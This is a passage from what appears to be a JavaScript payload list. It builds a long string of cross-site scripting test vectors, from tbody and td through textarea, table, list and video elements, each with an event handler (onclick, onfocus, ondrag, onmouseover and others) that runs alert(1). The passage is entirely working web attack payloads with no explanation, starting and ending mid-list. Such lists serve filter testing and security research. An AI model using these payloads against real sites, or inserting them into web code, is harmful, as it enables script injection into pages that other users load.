oncopy="alert(1)" contenteditable>test</tbody>' +xss,'<tbody oncut="alert(1)" contenteditable>test</tbody>' +xss,'<tbody ondblclick="alert(1)">test</tbody>' +xss,'<tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus>' +xss,'<tbody onkeydown="alert(1)" contenteditable>test</tbody>' +xss,'<tbody onkeypress="alert(1)" contenteditable>test</tbody>' +xss,'<tbody onkeyup="alert(1)" contenteditable>test</tbody>' +xss,'<tbody onmousedown="alert(1)">test</tbody>' +xss,'<tbody onmouseenter="alert(1)">test</tbody>' +xss,'<tbody onmouseleave="alert(1)">test</tbody>' +xss,'<tbody onmousemove="alert(1)">test</tbody>' +xss,'<tbody onmouseout="alert(1)">test</tbody>' +xss,'<tbody onmouseover="alert(1)">test</tbody>' +xss,'<tbody onmouseup="alert(1)">test</tbody>' +xss,'<tbody onpaste="alert(1)" contenteditable>test</tbody>' +xss,'<td draggable="true" ondrag="alert(1)">test</td>' +xss,'<td draggable="true" ondragend="alert(1)">test</td>' +xss,'<td draggable="true" ondragenter="alert(1)">test</td>' +xss,'<td draggable="true" ondragleave="alert(1)">test</td>' +xss,'<td draggable="true" ondragstart="alert(1)">test</td>' +xss,'<td id=x tabindex=1 onactivate=alert(1)></td>' +xss,'<td id=x tabindex=1 onbeforeactivate=alert(1)></td>' +xss,'<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus>' +xss,'<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus>' +xss,'<td id=x tabindex=1 onfocus=alert(1)></td>' +xss,'<td id=x tabindex=1 onfocusin=alert(1)></td>' +xss,'<td onbeforecopy="alert(1)" contenteditable>test</td>' +xss,'<td onbeforecut="alert(1)" contenteditable>test</td>' +xss,'<td onbeforepaste="alert(1)" contenteditable>test</td>' +xss,'<td onblur=alert(1) tabindex=1 id=x></td><input autofocus>' +xss,'<td onclick="alert(1)">test</td>' +xss,'<td oncontextmenu="alert(1)">test</td>' +xss,'<td oncopy="alert(1)" contenteditable>test</td>' +xss,'<td oncut="alert(1)" contenteditable>test</td>' +xss,'<td ondblclick="alert(1)">test</td>' +xss,'<td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus>' +xss,'<td onkeydown="alert(1)" contenteditable>test</td>' +xss,'<td onkeypress="alert(1)" contenteditable>test</td>' +xss,'<td onkeyup="alert(1)" contenteditable>test</td>' +xss,'<td onmousedown="alert(1)">test</td>' +xss,'<td onmouseenter="alert(1)">test</td>' +xss,'<td onmouseleave="alert(1)">test</td>' +xss,'<td onmousemove="alert(1)">test</td>' +xss,'<td onmouseout="alert(1)">test</td>' +xss,'<td onmouseover="alert(1)">test</td>' +xss,'<td onmouseup="alert(1)">test</td>' +xss,'<td onpaste="alert(1)" contenteditable>test</td>' +xss,'<template draggable="true" ondrag="alert(1)">test</template>' +xss,'<template draggable="true" ondragend="alert(1)">test</template>' +xss,'<template draggable="true" ondragenter="alert(1)">test</template>' +xss,'<template draggable="true" ondragleave="alert(1)">test</template>' +xss,'<template draggable="true" ondragstart="alert(1)">test</template>' +xss,'<template id=x tabindex=1 onactivate=alert(1)></template>' +xss,'<template id=x tabindex=1 onbeforeactivate=alert(1)></template>' +xss,'<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus>' +xss,'<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus>' +xss,'<template id=x tabindex=1 onfocus=alert(1)></template>' +xss,'<template id=x tabindex=1 onfocusin=alert(1)></template>' +xss,'<template onbeforecopy="alert(1)" contenteditable>test</template>' +xss,'<template onbeforecut="alert(1)" contenteditable>test</template>' +xss,'<template onbeforepaste="alert(1)" contenteditable>test</template>' +xss,'<template onblur=alert(1) tabindex=1 id=x></template><input autofocus>' +xss,'<template onclick="alert(1)">test</template>' +xss,'<template oncontextmenu="alert(1)">test</template>' +xss,'<template oncopy="alert(1)" contenteditable>test</template>' +xss,'<template oncut="alert(1)" contenteditable>test</template>' +xss,'<template ondblclick="alert(1)">test</template>' +xss,'<template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus>' +xss,'<template onkeydown="alert(1)" contenteditable>test</template>' +xss,'<template onkeypress="alert(1)" contenteditable>test</template>' +xss,'<template onkeyup="alert(1)" contenteditable>test</template>' +xss,'<template onmousedown="alert(1)">test</template>' +xss,'<template onmouseenter="alert(1)">test</template>' +xss,'<template onmouseleave="alert(1)">test</template>' +xss,'<template onmousemove="alert(1)">test</template>' +xss,'<template onmouseout="alert(1)">test</template>' +xss,'<template onmouseover="alert(1)">test</template>' +xss,'<template onmouseup="alert(1)">test</template>' +xss,'<template onpaste="alert(1)" contenteditable>test</template>' +xss,'<textarea autofocus onfocus=alert(1)>test</textarea>' +xss,'<textarea autofocus onfocusin=alert(1)>test</textarea>' +xss,'<textarea draggable="true" ondrag="alert(1)">test</textarea>' +xss,'<textarea draggable="true" ondragend="alert(1)">test</textarea>' +xss,'<textarea draggable="true" ondragenter="alert(1)">test</textarea>' +xss,'<textarea draggable="true" ondragleave="alert(1)">test</textarea>' +xss,'<textarea draggable="true" ondragstart="alert(1)">test</textarea>' +xss,'<textarea id=x tabindex=1 onactivate=alert(1)></textarea>' +xss,'<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea>' +xss,'<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus>' +xss,'<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus>' +xss,'<textarea onauxclick=alert(1)>XSS</textarea>' +xss,'<textarea onbeforecopy=alert(1) autofocus>XSS</textarea>' +xss,'<textarea onbeforecut=alert(1) autofocus>XSS</textarea>' +xss,'<textarea onbeforepaste=alert(1) autofocus></textarea>' +xss,'<textarea onblur=alert(1) id=x></textarea><input autofocus>' +xss,'<textarea onchange=alert(1)>XSS</textarea>' +xss,'<textarea onclick="alert(1)">test</textarea>' +xss,'<textarea oncontextmenu="alert(1)">test</textarea>' +xss,'<textarea oncopy=alert(1) autofocus>XSS</textarea>' +xss,'<textarea oncut=alert(1) autofocus>XSS</textarea>' +xss,'<textarea ondblclick="alert(1)">test</textarea>' +xss,'<textarea onfocusout=alert(1) id=x></textarea><input autofocus>' +xss,'<textarea oninput=alert(1)>XSS</textarea>' +xss,'<textarea onkeydown="alert(1)" contenteditable>test</textarea>' +xss,'<textarea onkeypress="alert(1)" contenteditable>test</textarea>' +xss,'<textarea onkeyup="alert(1)" contenteditable>test</textarea>' +xss,'<textarea onmousedown="alert(1)">test</textarea>' +xss,'<textarea onmouseenter="alert(1)">test</textarea>' +xss,'<textarea onmouseleave="alert(1)">test</textarea>' +xss,'<textarea onmousemove="alert(1)">test</textarea>' +xss,'<textarea onmouseout="alert(1)">test</textarea>' +xss,'<textarea onmouseover="alert(1)">test</textarea>' +xss,'<textarea onmouseup="alert(1)">test</textarea>' +xss,'<textarea onpaste=alert(1) autofocus></textarea>' +xss,'<textarea onselect=alert(1) autofocus>XSS</textarea>' +xss,'<tfoot draggable="true" ondrag="alert(1)">test</tfoot>' +xss,'<tfoot draggable="true" ondragend="alert(1)">test</tfoot>' +xss,'<tfoot draggable="true" ondragenter="alert(1)">test</tfoot>' +xss,'<tfoot draggable="true" ondragleave="alert(1)">test</tfoot>' +xss,'<tfoot draggable="true" ondragstart="alert(1)">test</tfoot>' +xss,'<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot>' +xss,'<tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot>' +xss,'<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>' +xss,'<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>' +xss,'<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot>' +xss,'<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot>' +xss,'<tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot onbeforecut="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus>' +xss,'<tfoot onclick="alert(1)">test</tfoot>' +xss,'<tfoot oncontextmenu="alert(1)">test</tfoot>' +xss,'<tfoot oncopy="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot oncut="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot ondblclick="alert(1)">test</tfoot>' +xss,'<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus>' +xss,'<tfoot onkeydown="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot onkeypress="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot onkeyup="alert(1)" contenteditable>test</tfoot>' +xss,'<tfoot onmousedown="alert(1)">test</tfoot>' +xss,'<tfoot onmouseenter="alert(1)">test</tfoot>' +xss,'<tfoot onmouseleave="alert(1)">test</tfoot>' +xss,'<tfoot onmousemove="alert(1)">test</tfoot>' +xss,'<tfoot onmouseout="alert(1)">test</tfoot>' +xss,'<tfoot onmouseover="alert(1)">test</tfoot>' +xss,'<tfoot onmouseup="alert(1)">test</tfoot>' +xss,'<tfoot onpaste="alert(1)" contenteditable>test</tfoot>' +xss,'<th draggable="true" ondrag="alert(1)">test</th>' +xss,'<th draggable="true" ondragend="alert(1)">test</th>' +xss,'<th draggable="true" ondragenter="alert(1)">test</th>' +xss,'<th draggable="true" ondragleave="alert(1)">test</th>' +xss,'<th draggable="true" ondragstart="alert(1)">test</th>' +xss,'<th id=x tabindex=1 onactivate=alert(1)></th>' +xss,'<th id=x tabindex=1 onbeforeactivate=alert(1)></th>' +xss,'<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus>' +xss,'<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus>' +xss,'<th id=x tabindex=1 onfocus=alert(1)></th>' +xss,'<th id=x tabindex=1 onfocusin=alert(1)></th>' +xss,'<th onbeforecopy="alert(1)" contenteditable>test</th>' +xss,'<th onbeforecut="alert(1)" contenteditable>test</th>' +xss,'<th onbeforepaste="alert(1)" contenteditable>test</th>' +xss,'<th onblur=alert(1) tabindex=1 id=x></th><input autofocus>' +xss,'<th onclick="alert(1)">test</th>' +xss,'<th oncontextmenu="alert(1)">test</th>' +xss,'<th oncopy="alert(1)" contenteditable>test</th>' +xss,'<th oncut="alert(1)" contenteditable>test</th>' +xss,'<th ondblclick="alert(1)">test</th>' +xss,'<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus>' +xss,'<th onkeydown="alert(1)" contenteditable>test</th>' +xss,'<th onkeypress="alert(1)" contenteditable>test</th>' +xss,'<th onkeyup="alert(1)" contenteditable>test</th>' +xss,'<th onmousedown="alert(1)">test</th>' +xss,'<th onmouseenter="alert(1)">test</th>' +xss,'<th onmouseleave="alert(1)">test</th>' +xss,'<th onmousemove="alert(1)">test</th>' +xss,'<th onmouseout="alert(1)">test</th>' +xss,'<th onmouseover="alert(1)">test</th>' +xss,'<th onmouseup="alert(1)">test</th>' +xss,'<th onpaste="alert(1)" contenteditable>test</th>' +xss,'<thead draggable="true" ondrag="alert(1)">test</thead>' +xss,'<thead draggable="true" ondragend="alert(1)">test</thead>' +xss,'<thead draggable="true" ondragenter="alert(1)">test</thead>' +xss,'<thead draggable="true" ondragleave="alert(1)">test</thead>' +xss,'<thead draggable="true" ondragstart="alert(1)">test</thead>' +xss,'<thead id=x tabindex=1 onactivate=alert(1)></thead>' +xss,'<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead>' +xss,'<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus>' +xss,'<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus>' +xss,'<thead id=x tabindex=1 onfocus=alert(1)></thead>' +xss,'<thead id=x tabindex=1 onfocusin=alert(1)></thead>' +xss,'<thead onbeforecopy="alert(1)" contenteditable>test</thead>' +xss,'<thead onbeforecut="alert(1)" contenteditable>test</thead>' +xss,'<thead onbeforepaste="alert(1)" contenteditable>test</thead>' +xss,'<thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus>' +xss,'<thead onclick="alert(1)">test</thead>' +xss,'<thead oncontextmenu="alert(1)">test</thead>' +xss,'<thead oncopy="alert(1)" contenteditable>test</thead>' +xss,'<thead oncut="alert(1)" contenteditable>test</thead>' +xss,'<thead ondblclick="alert(1)">test</thead>' +xss,'<thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus>' +xss,'<thead onkeydown="alert(1)" contenteditable>test</thead>' +xss,'<thead onkeypress="alert(1)" contenteditable>test</thead>' +xss,'<thead onkeyup="alert(1)" contenteditable>test</thead>' +xss,'<thead onmousedown="alert(1)">test</thead>' +xss,'<thead onmouseenter="alert(1)">test</thead>' +xss,'<thead onmouseleave="alert(1)">test</thead>' +xss,'<thead onmousemove="alert(1)">test</thead>' +xss,'<thead onmouseout="alert(1)">test</thead>' +xss,'<thead onmouseover="alert(1)">test</thead>' +xss,'<thead onmouseup="alert(1)">test</thead>' +xss,'<thead onpaste="alert(1)" contenteditable>test</thead>' +xss,'<time draggable="true" ondrag="alert(1)">test</time>' +xss,'<time draggable="true" ondragend="alert(1)">test</time>' +xss,'<time draggable="true" ondragenter="alert(1)">test</time>' +xss,'<time draggable="true" ondragleave="alert(1)">test</time>' +xss,'<time draggable="true" ondragstart="alert(1)">test</time>' +xss,'<time id=x tabindex=1 onactivate=alert(1)></time>' +xss,'<time id=x tabindex=1 onbeforeactivate=alert(1)></time>' +xss,'<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus>' +xss,'<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus>' +xss,'<time id=x tabindex=1 onfocus=alert(1)></time>' +xss,'<time id=x tabindex=1 onfocusin=alert(1)></time>' +xss,'<time onbeforecopy="alert(1)" contenteditable>test</time>' +xss,'<time onbeforecut="alert(1)" contenteditable>test</time>' +xss,'<time onbeforepaste="alert(1)" contenteditable>test</time>' +xss,'<time onblur=alert(1) tabindex=1 id=x></time><input autofocus>' +xss,'<time onclick="alert(1)">test</time>' +xss,'<time oncontextmenu="alert(1)">test</time>' +xss,'<time oncopy="alert(1)" contenteditable>test</time>' +xss,'<time oncut="alert(1)" contenteditable>test</time>' +xss,'<time ondblclick="alert(1)">test</time>' +xss,'<time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus>' +xss,'<time onkeydown="alert(1)" contenteditable>test</time>' +xss,'<time onkeypress="alert(1)" contenteditable>test</time>' +xss,'<time onkeyup="alert(1)" contenteditable>test</time>' +xss,'<time onmousedown="alert(1)">test</time>' +xss,'<time onmouseenter="alert(1)">test</time>' +xss,'<time onmouseleave="alert(1)">test</time>' +xss,'<time onmousemove="alert(1)">test</time>' +xss,'<time onmouseout="alert(1)">test</time>' +xss,'<time onmouseover="alert(1)">test</time>' +xss,'<time onmouseup="alert(1)">test</time>' +xss,'<time onpaste="alert(1)" contenteditable>test</time>' +xss,'<title draggable="true" ondrag="alert(1)">test</title>' +xss,'<title draggable="true" ondragend="alert(1)">test</title>' +xss,'<title draggable="true" ondragenter="alert(1)">test</title>' +xss,'<title draggable="true" ondragleave="alert(1)">test</title>' +xss,'<title draggable="true" ondragstart="alert(1)">test</title>' +xss,'<title id=x tabindex=1 onactivate=alert(1)></title>' +xss,'<title id=x tabindex=1 onbeforeactivate=alert(1)></title>' +xss,'<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus>' +xss,'<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus>' +xss,'<title id=x tabindex=1 onfocus=alert(1)></title>' +xss,'<title id=x tabindex=1 onfocusin=alert(1)></title>' +xss,'<title onbeforecopy="alert(1)" contenteditable>test</title>' +xss,'<title onbeforecut="alert(1)" contenteditable>test</title>' +xss,'<title onbeforepaste="alert(1)" contenteditable>test</title>' +xss,'<title onblur=alert(1) tabindex=1 id=x></title><input autofocus>' +xss,'<title onclick="alert(1)">test</title>' +xss,'<title oncontextmenu="alert(1)">test</title>' +xss,'<title oncopy="alert(1)" contenteditable>test</title>' +xss,'<title oncut="alert(1)" contenteditable>test</title>' +xss,'<title ondblclick="alert(1)">test</title>' +xss,'<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus>' +xss,'<title onkeydown="alert(1)" contenteditable>test</title>' +xss,'<title onkeypress="alert(1)" contenteditable>test</title>' +xss,'<title onkeyup="alert(1)" contenteditable>test</title>' +xss,'<title onmousedown="alert(1)">test</title>' +xss,'<title onmouseenter="alert(1)">test</title>' +xss,'<title onmouseleave="alert(1)">test</title>' +xss,'<title onmousemove="alert(1)">test</title>' +xss,'<title onmouseout="alert(1)">test</title>' +xss,'<title onmouseover="alert(1)">test</title>' +xss,'<title onmouseup="alert(1)">test</title>' +xss,'<title onpaste="alert(1)" contenteditable>test</title>' +xss,'<tr draggable="true" ondrag="alert(1)">test</tr>' +xss,'<tr draggable="true" ondragend="alert(1)">test</tr>' +xss,'<tr draggable="true" ondragenter="alert(1)">test</tr>' +xss,'<tr draggable="true" ondragleave="alert(1)">test</tr>' +xss,'<tr draggable="true" ondragstart="alert(1)">test</tr>' +xss,'<tr id=x tabindex=1 onactivate=alert(1)></tr>' +xss,'<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr>' +xss,'<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus>' +xss,'<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus>' +xss,'<tr id=x tabindex=1 onfocus=alert(1)></tr>' +xss,'<tr id=x tabindex=1 onfocusin=alert(1)></tr>' +xss,'<tr onbeforecopy="alert(1)" contenteditable>test</tr>' +xss,'<tr onbeforecut="alert(1)" contenteditable>test</tr>' +xss,'<tr onbeforepaste="alert(1)" contenteditable>test</tr>' +xss,'<tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus>' +xss,'<tr onclick="alert(1)">test</tr>' +xss,'<tr oncontextmenu="alert(1)">test</tr>' +xss,'<tr oncopy="alert(1)" contenteditable>test</tr>' +xss,'<tr oncut="alert(1)" contenteditable>test</tr>' +xss,'<tr ondblclick="alert(1)">test</tr>' +xss,'<tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus>' +xss,'<tr onkeydown="alert(1)" contenteditable>test</tr>' +xss,'<tr onkeypress="alert(1)" contenteditable>test</tr>' +xss,'<tr onkeyup="alert(1)" contenteditable>test</tr>' +xss,'<tr onmousedown="alert(1)">test</tr>' +xss,'<tr onmouseenter="alert(1)">test</tr>' +xss,'<tr onmouseleave="alert(1)">test</tr>' +xss,'<tr onmousemove="alert(1)">test</tr>' +xss,'<tr onmouseout="alert(1)">test</tr>' +xss,'<tr onmouseover="alert(1)">test</tr>' +xss,'<tr onmouseup="alert(1)">test</tr>' +xss,'<tr onpaste="alert(1)" contenteditable>test</tr>' +xss,'<track draggable="true" ondrag="alert(1)">test</track>' +xss,'<track draggable="true" ondragend="alert(1)">test</track>' +xss,'<track draggable="true" ondragenter="alert(1)">test</track>' +xss,'<track draggable="true" ondragleave="alert(1)">test</track>' +xss,'<track draggable="true" ondragstart="alert(1)">test</track>' +xss,'<track id=x tabindex=1 onactivate=alert(1)></track>' +xss,'<track id=x tabindex=1 onbeforeactivate=alert(1)></track>' +xss,'<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus>' +xss,'<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus>' +xss,'<track id=x tabindex=1 onfocus=alert(1)></track>' +xss,'<track id=x tabindex=1 onfocusin=alert(1)></track>' +xss,'<track onbeforecopy="alert(1)" contenteditable>test</track>' +xss,'<track onbeforecut="alert(1)" contenteditable>test</track>' +xss,'<track onbeforepaste="alert(1)" contenteditable>test</track>' +xss,'<track onblur=alert(1) tabindex=1 id=x></track><input autofocus>' +xss,'<track onclick="alert(1)">test</track>' +xss,'<track oncontextmenu="alert(1)">test</track>' +xss,'<track oncopy="alert(1)" contenteditable>test</track>' +xss,'<track oncut="alert(1)" contenteditable>test</track>' +xss,'<track ondblclick="alert(1)">test</track>' +xss,'<track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus>' +xss,'<track onkeydown="alert(1)" contenteditable>test</track>' +xss,'<track onkeypress="alert(1)" contenteditable>test</track>' +xss,'<track onkeyup="alert(1)" contenteditable>test</track>' +xss,'<track onmousedown="alert(1)">test</track>' +xss,'<track onmouseenter="alert(1)">test</track>' +xss,'<track onmouseleave="alert(1)">test</track>' +xss,'<track onmousemove="alert(1)">test</track>' +xss,'<track onmouseout="alert(1)">test</track>' +xss,'<track onmouseover="alert(1)">test</track>' +xss,'<track onmouseup="alert(1)">test</track>' +xss,'<track onpaste="alert(1)" contenteditable>test</track>' +xss,'<tt draggable="true" ondrag="alert(1)">test</tt>' +xss,'<tt draggable="true" ondragend="alert(1)">test</tt>' +xss,'<tt draggable="true" ondragenter="alert(1)">test</tt>' +xss,'<tt draggable="true" ondragleave="alert(1)">test</tt>' +xss,'<tt draggable="true" ondragstart="alert(1)">test</tt>' +xss,'<tt id=x tabindex=1 onactivate=alert(1)></tt>' +xss,'<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt>' +xss,'<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus>' +xss,'<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus>' +xss,'<tt id=x tabindex=1 onfocus=alert(1)></tt>' +xss,'<tt id=x tabindex=1 onfocusin=alert(1)></tt>' +xss,'<tt onbeforecopy="alert(1)" contenteditable>test</tt>' +xss,'<tt onbeforecut="alert(1)" contenteditable>test</tt>' +xss,'<tt onbeforepaste="alert(1)" contenteditable>test</tt>' +xss,'<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus>' +xss,'<tt onclick="alert(1)">test</tt>' +xss,'<tt oncontextmenu="alert(1)">test</tt>' +xss,'<tt oncopy="alert(1)" contenteditable>test</tt>' +xss,'<tt oncut="alert(1)" contenteditable>test</tt>' +xss,'<tt ondblclick="alert(1)">test</tt>' +xss,'<tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus>' +xss,'<tt onkeydown="alert(1)" contenteditable>test</tt>' +xss,'<tt onkeypress="alert(1)" contenteditable>test</tt>' +xss,'<tt onkeyup="alert(1)" contenteditable>test</tt>' +xss,'<tt onmousedown="alert(1)">test</tt>' +xss,'<tt onmouseenter="alert(1)">test</tt>' +xss,'<tt onmouseleave="alert(1)">test</tt>' +xss,'<tt onmousemove="alert(1)">test</tt>' +xss,'<tt onmouseout="alert(1)">test</tt>' +xss,'<tt onmouseover="alert(1)">test</tt>' +xss,'<tt onmouseup="alert(1)">test</tt>' +xss,'<tt onpaste="alert(1)" contenteditable>test</tt>' +xss,'<u draggable="true" ondrag="alert(1)">test</u>' +xss,'<u draggable="true" ondragend="alert(1)">test</u>' +xss,'<u draggable="true" ondragenter="alert(1)">test</u>' +xss,'<u draggable="true" ondragleave="alert(1)">test</u>' +xss,'<u draggable="true" ondragstart="alert(1)">test</u>' +xss,'<u id=x tabindex=1 onactivate=alert(1)></u>' +xss,'<u id=x tabindex=1 onbeforeactivate=alert(1)></u>' +xss,'<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus>' +xss,'<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus>' +xss,'<u id=x tabindex=1 onfocus=alert(1)></u>' +xss,'<u id=x tabindex=1 onfocusin=alert(1)></u>' +xss,'<u onbeforecopy="alert(1)" contenteditable>test</u>' +xss,'<u onbeforecut="alert(1)" contenteditable>test</u>' +xss,'<u onbeforepaste="alert(1)" contenteditable>test</u>' +xss,'<u onblur=alert(1) tabindex=1 id=x></u><input autofocus>' +xss,'<u onclick="alert(1)">test</u>' +xss,'<u oncontextmenu="alert(1)">test</u>' +xss,'<u oncopy="alert(1)" contenteditable>test</u>' +xss,'<u oncut="alert(1)" contenteditable>test</u>' +xss,'<u ondblclick="alert(1)">test</u>' +xss,'<u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus>' +xss,'<u onkeydown="alert(1)" contenteditable>test</u>' +xss,'<u onkeypress="alert(1)" contenteditable>test</u>' +xss,'<u onkeyup="alert(1)" contenteditable>test</u>' +xss,'<u onmousedown="alert(1)">test</u>' +xss,'<u onmouseenter="alert(1)">test</u>' +xss,'<u onmouseleave="alert(1)">test</u>' +xss,'<u onmousemove="alert(1)">test</u>' +xss,'<u onmouseout="alert(1)">test</u>' +xss,'<u onmouseover="alert(1)">test</u>' +xss,'<u onmouseup="alert(1)">test</u>' +xss,'<u onpaste="alert(1)" contenteditable>test</u>' +xss,'<ul draggable="true" ondrag="alert(1)">test</ul>' +xss,'<ul draggable="true" ondragend="alert(1)">test</ul>' +xss,'<ul draggable="true" ondragenter="alert(1)">test</ul>' +xss,'<ul draggable="true" ondragleave="alert(1)">test</ul>' +xss,'<ul draggable="true" ondragstart="alert(1)">test</ul>' +xss,'<ul id=x tabindex=1 onactivate=alert(1)></ul>' +xss,'<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul>' +xss,'<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus>' +xss,'<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus>' +xss,'<ul id=x tabindex=1 onfocus=alert(1)></ul>' +xss,'<ul id=x tabindex=1 onfocusin=alert(1)></ul>' +xss,'<ul onbeforecopy="alert(1)" contenteditable>test</ul>' +xss,'<ul onbeforecut="alert(1)" contenteditable>test</ul>' +xss,'<ul onbeforepaste="alert(1)" contenteditable>test</ul>' +xss,'<ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus>' +xss,'<ul onclick="alert(1)">test</ul>' +xss,'<ul oncontextmenu="alert(1)">test</ul>' +xss,'<ul oncopy="alert(1)" contenteditable>test</ul>' +xss,'<ul oncut="alert(1)" contenteditable>test</ul>' +xss,'<ul ondblclick="alert(1)">test</ul>' +xss,'<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus>' +xss,'<ul onkeydown="alert(1)" contenteditable>test</ul>' +xss,'<ul onkeypress="alert(1)" contenteditable>test</ul>' +xss,'<ul onkeyup="alert(1)" contenteditable>test</ul>' +xss,'<ul onmousedown="alert(1)">test</ul>' +xss,'<ul onmouseenter="alert(1)">test</ul>' +xss,'<ul onmouseleave="alert(1)">test</ul>' +xss,'<ul onmousemove="alert(1)">test</ul>' +xss,'<ul onmouseout="alert(1)">test</ul>' +xss,'<ul onmouseover="alert(1)">test</ul>' +xss,'<ul onmouseup="alert(1)">test</ul>' +xss,'<ul onpaste="alert(1)" contenteditable>test</ul>' +xss,'<var draggable="true" ondrag="alert(1)">test</var>' +xss,'<var draggable="true" ondragend="alert(1)">test</var>' +xss,'<var draggable="true" ondragenter="alert(1)">test</var>' +xss,'<var draggable="true" ondragleave="alert(1)">test</var>' +xss,'<var draggable="true" ondragstart="alert(1)">test</var>' +xss,'<var id=x tabindex=1 onactivate=alert(1)></var>' +xss,'<var id=x tabindex=1 onbeforeactivate=alert(1)></var>' +xss,'<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus>' +xss,'<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus>' +xss,'<var id=x tabindex=1 onfocus=alert(1)></var>' +xss,'<var id=x tabindex=1 onfocusin=alert(1)></var>' +xss,'<var onbeforecopy="alert(1)" contenteditable>test</var>' +xss,'<var onbeforecut="alert(1)" contenteditable>test</var>' +xss,'<var onbeforepaste="alert(1)" contenteditable>test</var>' +xss,'<var onblur=alert(1) tabindex=1 id=x></var><input autofocus>' +xss,'<var onclick="alert(1)">test</var>' +xss,'<var oncontextmenu="alert(1)">test</var>' +xss,'<var oncopy="alert(1)" contenteditable>test</var>' +xss,'<var oncut="alert(1)" contenteditable>test</var>' +xss,'<var ondblclick="alert(1)">test</var>' +xss,'<var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus>' +xss,'<var onkeydown="alert(1)" contenteditable>test</var>' +xss,'<var onkeypress="alert(1)" contenteditable>test</var>' +xss,'<var onkeyup="alert(1)" contenteditable>test</var>' +xss,'<var onmousedown="alert(1)">test</var>' +xss,'<var onmouseenter="alert(1)">test</var>' +xss,'<var onmouseleave="alert(1)">test</var>' +xss,'<var onmousemove="alert(1)">test</var>' +xss,'<var onmouseout="alert(1)">test</var>' +xss,'<var onmouseover="alert(1)">test</var>' +xss,'<var onmouseup="alert(1)">test</var>' +xss,'<var onpaste="alert(1)" contenteditable>test</var>' +xss,'<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video autoplay controls onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>' +xss,'<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video draggable="true" ondrag="alert(1)">test</video>' +xss,'<video draggable="true" ondragend="alert(1)">test</video>' +xss,'<video draggable="true" ondragenter="alert(1)">test</video>' +xss,'<video draggable="true" ondragleave="alert(1)">test</video>' 